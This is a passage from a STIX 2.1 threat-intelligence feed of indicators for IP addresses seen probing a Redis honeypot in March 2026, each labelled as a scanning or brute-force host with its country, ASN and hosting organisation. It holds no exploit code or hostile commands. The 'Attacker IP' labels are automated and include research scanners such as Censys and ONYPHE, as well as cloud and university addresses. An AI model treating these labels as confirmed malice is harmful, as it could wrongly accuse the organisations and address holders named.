      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--f9e103c2-5494-4119-b8ea-5d54734e3d82",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '123.56.146.124']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T02:25:13.000Z",
      "valid_until": "2026-04-02T02:25:12.000Z"
    },
    {
      "created": "2026-03-01T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0",
      "id": "indicator--aeb4bd7e-61b7-42fd-93eb-2dfa8cbdd503",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.156.73.180']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T02:25:13.000Z",
      "valid_until": "2026-04-02T02:25:12.000Z"
    },
    {
      "created": "2026-03-01T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--46c4e495-3987-40a3-88ea-3bcee0e632ac",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '48.214.25.59']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T02:25:13.000Z",
      "valid_until": "2026-04-02T02:25:12.000Z"
    },
    {
      "created": "2026-03-01T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--1de4305a-38f4-48a4-af7e-7b41dd16ffe4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.153.131']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T02:25:13.000Z",
      "valid_until": "2026-04-02T02:25:12.000Z"
    },
    {
      "created": "2026-03-01T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--430f6b25-f6b1-4a64-bdc0-89c86d222464",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.153.151']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T02:25:13.000Z",
      "valid_until": "2026-04-02T02:25:12.000Z"
    },
    {
      "created": "2026-03-01T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=DE; asn=8560; asn_org=IONOS SE; redis_cmd_hits=0",
      "id": "indicator--f274e4aa-2a7b-4d0e-8438-8ec3dbcb913d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '217.160.255.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T03:25:13.000Z",
      "valid_until": "2026-04-02T03:25:12.000Z"
    },
    {
      "created": "2026-03-01T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--e0ae4e3f-b261-491b-b04e-91ea1a136bda",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.121.142.102']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T03:25:13.000Z",
      "valid_until": "2026-04-02T03:25:12.000Z"
    },
    {
      "created": "2026-03-01T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--59e82764-3c26-4632-9135-8213d9ade5fa",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '100.28.153.226']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T04:25:13.000Z",
      "valid_until": "2026-04-02T04:25:12.000Z"
    },
    {
      "created": "2026-03-01T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--2a382b6c-13d3-45ed-a704-0047641db63b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.13.124.241']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T04:25:13.000Z",
      "valid_until": "2026-04-02T04:25:12.000Z"
    },
    {
      "created": "2026-03-01T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--3b225698-beec-494d-a568-591ffb15cf2a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '13.64.227.206']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T04:25:13.000Z",
      "valid_until": "2026-04-02T04:25:12.000Z"
    },
    {
      "created": "2026-03-01T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--4590ed99-4db1-455c-9fd0-dc382f630311",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.231.89.13']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T04:25:13.000Z",
      "valid_until": "2026-04-02T04:25:12.000Z"
    },
    {
      "created": "2026-03-01T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--761576db-abd5-46b9-ab91-a594352149da",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.231.89.135']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T04:25:13.000Z",
      "valid_until": "2026-04-02T04:25:12.000Z"
    },
    {
      "created": "2026-03-01T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0",
      "id": "indicator--1145077c-2517-4617-89f2-667b7d5a009e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.231.89.53']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T04:25:13.000Z",
      "valid_until": "2026-04-02T04:25:12.000Z"
    },
    {
      "created": "2026-03-01T05:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--c9195e98-4b70-40bf-8e59-ce9eb4c5f8e1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T05:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '125.67.236.54']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T05:25:06.000Z",
      "valid_until": "2026-04-02T05:25:05.000Z"
    },
    {
      "created": "2026-03-01T05:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--210433d7-83d1-4f33-af00-66b2da3511fd",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T05:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.129.187.38']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T05:25:06.000Z",
      "valid_until": "2026-04-02T05:25:05.000Z"
    },
    {
      "created": "2026-03-01T05:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--e98711eb-ad08-4e3b-a2d2-96696d1681f8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T05:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '74.82.47.32']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T05:25:06.000Z",
      "valid_until": "2026-04-02T05:25:05.000Z"
    },
    {
      "created": "2026-03-01T05:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=29; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--59d3ae83-218a-4314-9574-c90a01b14925",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T05:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '74.82.47.4']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T05:25:06.000Z",
      "valid_until": "2026-04-02T05:25:05.000Z"
    },
    {
      "created": "2026-03-01T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=264990; asn_org=WT INFORMATICA TELECOMUNICACOES LTDA - ME; redis_cmd_hits=0",
      "id": "indicator--45b2375d-42f2-4585-904c-36c1d7e05efc",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '170.84.23.31']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T06:25:13.000Z",
      "valid_until": "2026-04-02T06:25:12.000Z"
    },
    {
      "created": "2026-03-01T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--8610047e-fb6d-4b81-9a69-c000ad285f1c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.54']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T06:25:13.000Z",
      "valid_until": "2026-04-02T06:25:12.000Z"
    },
    {
      "created": "2026-03-01T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=DE; asn=51167; asn_org=Contabo GmbH; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0",
      "id": "indicator--fe665edc-a5b4-4f91-b386-214aa354bf5e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.22.146.182']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T07:25:06.000Z",
      "valid_until": "2026-04-02T07:25:05.000Z"
    },
    {
      "created": "2026-03-01T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=58; ports=6379; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--cded6b0a-f596-47f4-bb89-8d1d9360182c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '194.50.16.198']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T07:25:06.000Z",
      "valid_until": "2026-04-02T07:25:05.000Z"
    },
    {
      "created": "2026-03-01T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--05a37e5f-4bcc-4af7-86a9-97c77468bfd4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '39.107.103.199']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T07:25:06.000Z",
      "valid_until": "2026-04-02T07:25:05.000Z"
    },
    {
      "created": "2026-03-01T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=UZ; asn=35682; asn_org=Best Internet Solution Xk; redis_cmd_hits=0",
      "id": "indicator--14306f72-0d4a-43df-bb3d-59dbc1f9c042",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.130.148.86']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T07:25:06.000Z",
      "valid_until": "2026-04-02T07:25:05.000Z"
    },
    {
      "created": "2026-03-01T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CA; asn=13768; asn_org=Aptum Technologies; redis_cmd_hits=0",
      "id": "indicator--6343cf9e-51fd-44d1-aced-1057c3384ca4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.39.151.180']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T07:25:06.000Z",
      "valid_until": "2026-04-02T07:25:05.000Z"
    },
    {
      "created": "2026-03-01T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=23; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--6a4cf02f-4f5c-42a7-a890-cbec26368e05",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '81.29.142.100']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T07:25:06.000Z",
      "valid_until": "2026-04-02T07:25:05.000Z"
    },
    {
      "created": "2026-03-01T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; redis_cmd_hits=0",
      "id": "indicator--a1c592bd-4461-442e-a00a-28af93636366",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '81.29.142.50']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T07:25:06.000Z",
      "valid_until": "2026-04-02T07:25:05.000Z"
    },
    {
      "created": "2026-03-01T08:25:11.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--6adbe385-e24f-4c68-9de1-14fa828dd28e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T08:25:11.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '180.76.114.78']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T08:25:11.000Z",
      "valid_until": "2026-04-02T08:25:10.000Z"
    },
    {
      "created": "2026-03-01T08:25:11.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0",
      "id": "indicator--8d7a1a5e-b176-4d88-b6b4-68bcfb7ef57b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T08:25:11.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '37.60.226.111']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T08:25:11.000Z",
      "valid_until": "2026-04-02T08:25:10.000Z"
    },
    {
      "created": "2026-03-01T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--22b7c063-1c4a-4e37-94be-71f9902d2ef8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.198.30.148']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T09:25:13.000Z",
      "valid_until": "2026-04-02T09:25:12.000Z"
    },
    {
      "created": "2026-03-01T10:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--90ed5a52-5611-4776-a41e-28c808d7bed2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T10:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.226.218.170']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T10:25:06.000Z",
      "valid_until": "2026-04-02T10:25:05.000Z"
    },
    {
      "created": "2026-03-01T10:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--7ded0026-9eaf-4453-9508-6c18be924859",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T10:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '61.153.23.162']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T10:25:06.000Z",
      "valid_until": "2026-04-02T10:25:05.000Z"
    },
    {
      "created": "2026-03-01T10:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=29; ports=6379; cc=GB; asn=201002; asn_org=PebbleHost Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--0a70c5b6-4efb-4f65-b9c1-baea0615176a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T10:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '85.11.182.25']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T10:25:06.000Z",
      "valid_until": "2026-04-02T10:25:05.000Z"
    },
    {
      "created": "2026-03-01T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=SG; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--33a68e96-b0cd-441d-9b55-d16078327ebd",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '139.162.47.15']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T11:25:13.000Z",
      "valid_until": "2026-04-02T11:25:12.000Z"
    },
    {
      "created": "2026-03-01T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--9fbdb126-5fd5-4ccf-8776-6b8976979f3a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '218.59.175.217']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T11:25:13.000Z",
      "valid_until": "2026-04-02T11:25:12.000Z"
    },
    {
      "created": "2026-03-01T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=27; ports=6379; cc=GB; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--b733cfe5-134d-4f4d-bfdc-836e4a675548",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.208.10.94']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T11:25:13.000Z",
      "valid_until": "2026-04-02T11:25:12.000Z"
    },
    {
      "created": "2026-03-01T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--ac5f78d9-486c-4555-a16a-a8cd1ea21568",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.245.229.234']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T12:25:13.000Z",
      "valid_until": "2026-04-02T12:25:12.000Z"
    },
    {
      "created": "2026-03-01T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=TH; asn=9486; asn_org=King Mongkuts Institute of Technology Ladkrabang; redis_cmd_hits=0",
      "id": "indicator--435044c7-f081-40d3-bea6-b886bfddf578",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '161.246.157.88']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T13:25:13.000Z",
      "valid_until": "2026-04-02T13:25:12.000Z"
    },
    {
      "created": "2026-03-01T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--9ace066e-964c-4f4e-bdc8-7f22f937ba67",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.236.106.113']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T13:25:13.000Z",
      "valid_until": "2026-04-02T13:25:12.000Z"
    },
    {
      "created": "2026-03-01T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--807d478b-66c3-4fc1-b7fe-ca164ea35f51",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.33.78.70']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T13:25:13.000Z",
      "valid_until": "2026-04-02T13:25:12.000Z"
    },
    {
      "created": "2026-03-01T14:25:06.000Z",
